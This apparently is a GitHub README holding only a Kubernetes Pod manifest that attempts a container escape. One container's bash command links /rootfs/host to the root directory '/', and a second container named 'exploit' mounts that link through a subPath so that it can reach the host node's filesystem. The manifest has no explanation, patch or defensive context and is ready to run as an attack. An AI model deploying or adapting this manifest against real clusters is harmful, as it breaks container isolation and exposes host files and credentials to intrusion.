README.md
Rendering markdown...
---
apiVersion: v1
kind: Pod
metadata:
name: subpath
spec:
containers:
- image: nginx:latest
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop:
- CHOWN
- DAC_OVERRIDE
- FOWNER
- FSETID
- KILL
- SETGID
- SETUID
- SETPCAP
- NET_BIND_SERVICE
- NET_ADMIN
- NET_RAW
- SYS_CHROOT
- MKNOD
- AUDIT_WRITE
name: setup
imagePullPolicy: "Always"
command: ["/bin/bash"]
args: ["-c", "cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity"]
volumeMounts:
- mountPath: /rootfs
name: escape-volume
- mountPath: /status
name: status-volume
- image: nginx:latest
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop:
- CHOWN
- DAC_OVERRIDE
- FOWNER
- FSETID
- KILL
- SETGID
- SETUID
- SETPCAP
- NET_BIND_SERVICE
- NET_ADMIN
- NET_RAW
- SYS_CHROOT
- MKNOD
- AUDIT_WRITE
name: exploit
imagePullPolicy: "Always"
command: ["/bin/bash"]
args: ["-c", "if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi"]
volumeMounts:
- mountPath: /rootfs
name: escape-volume
subPath: host
- mountPath: /status
name: status-volume
volumes:
- name: escape-volume
emptyDir: {}
- name: status-volume
emptyDir: {}